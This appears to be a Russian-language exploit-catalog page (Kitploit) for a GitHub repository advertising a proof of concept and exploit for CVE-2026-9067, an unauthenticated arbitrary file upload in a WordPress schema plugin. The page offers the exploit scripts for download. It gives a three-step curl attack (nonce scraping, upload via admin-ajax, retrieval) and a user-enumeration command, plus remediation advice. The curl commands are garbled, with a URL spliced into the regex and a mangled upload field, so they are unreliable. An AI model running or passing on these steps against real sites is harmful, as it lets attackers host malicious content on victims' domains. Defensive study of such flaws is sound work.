Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
By-Poloss..-..CVE-2026-9067 — Schema & Structured Data for WP & AMP < 1.60 - Неаутентифицированная произвольная загрузка медиафайлов [POC & Xploit] | Kitploit
Инструменты/GitHubGitHub/polosss/by-poloss..-..cve-2026-9067
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubpolosss/by-poloss..-..cve-2026-9067

By-Poloss..-..CVE-2026-9067

Schema & Structured Data for WP & AMP < 1.60 - Неаутентифицированная произвольная загрузка медиафайлов [POC & Xploit]

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
32 месяцев назадЕщё не проверено

POC & Xploit — Каталог PoC

Документация и эксплойты для уязвимостей, обнаруженных в среде тестирования безопасности WordPress.


Список уязвимостей

CVE IDПлагинКритичностьТипСтатус
CVE-2026-9067Schema & Structured Data for WP & AMPВысокая (8.1)Неограниченная загрузка файловДокументировано

CVE-2026-9067

Краткая сводка

Описание уязвимости

Плагин Schema & Structured Data for WP & AMP до версии 1.60 не проверяет права (capabilities) пользователя в AJAX-обработчиках загрузки файлов и не проверяет тип загружаемых файлов. Это позволяет неаутентифицированному атакующему загружать произвольные файлы.

Воздействие

  • Размещение контента: Атакующий может размещать вредоносный контент на домене жертвы
  • Расход дискового пространства: Загрузка произвольных файлов может исчерпать дисковое пространство
  • Злоупотребление репутацией: Распространение вредоносного ПО и фишинговых страниц с домена жертвы

Важное примечание: Ядро WordPress блокирует исполняемые файлы (.php, .phtml, .html, .svg), поэтому прямого пути к RCE из этой уязвимости нет.

Файлы

root@kitploit:~
CVE-2026-9067/
├── CVE-2026-9067.md       # Dokumentasi lengkap (file ini)
├── CVE-2026-9067.py       # Python exploit dengan multi-threading
├── CVE-2026-9067.sh       # Bash/Shell PoC script
└── CVE-2026-9067_exploit.sh  # Alternative Bash PoC

Быстрый PoC

root@kitploit:~
# Step 1: Get nonce
NONCE=$(curl -s "https://yorbit7.ddev.site/" | grep -oP 'saswp_rf_(page_)?security_nonce["\x27]?\s*:\s*["\'](https://github.com/polosss/by-poloss..-..cve-2026-9067/blob/HEAD/%5Ba-f0-9%5D%7B10%7D)["\']' | grep -oP '[a-f0-9]{10}' | head -1)

# Step 2: Upload arbitrary file
curl -X POST 'https://yorbit7.ddev.site/wp-admin/admin-ajax.php' \
  -F 'action=saswp_rf_form_image_upload' \
  -F "saswp_rf_form_nonce=$NONCE" \
  -F '[email protected];type=image/png;filename=evil.csv'

# Step 3: Access uploaded file
curl -s "https://yorbit7.ddev.site/wp-content/uploads/$(date +%Y)/$(date +%m)/evil.csv"

Информация об окружении


Команды тестирования

Проверка статуса сайта

root@kitploit:~
curl -s -o /dev/null -w "%{http_code}" https://yorbit7.ddev.site

Проверка версии плагина

root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-content/plugins/schema-and-structured-data-for-wp/readme.txt | grep -i "Stable tag:"

Перечисление пользователей

root@kitploit:~
curl -s https://yorbit7.ddev.site/wp-json/wp/v2/users | jq '.[] | {id, name, slug}'

Меры по устранению

  1. Обновите плагин: Обновите Schema & Structured Data for WP & AMP до версии 1.60 или новее
  2. Отключите плагин: Если обновление невозможно, отключите плагин
  3. Усиление защиты:
    • Установите константу DISALLOW_FILE_MODIFICATIONS
    • Отключите выполнение PHP в каталоге uploads через .htaccess
    • Внедрите правила WAF

Ссылки

  • NVD CVE-2026-9067
  • База данных уязвимостей WPScan
  • Страница плагина WordPress
  • Первоначальный исследователь: 0xBassia
Скачать инструмент
ПолеЗначение
CVE IDCVE-2026-9067
ПлагинSchema & Structured Data for WP & AMP
Затронутые версии< 1.60
CWECWE-434 (неограниченная загрузка файла опасного типа)
CVSS v3.18.1 (высокая)
Исследователь0xBassia
ПолеЗначение
Целевой URLhttps://yorbit7.ddev.site
Версия PHP8.4
База данныхMariaDB 11.8
Версия WordPress7.0
Метод тестированияна основе curl (тестирование методом «чёрного ящика»)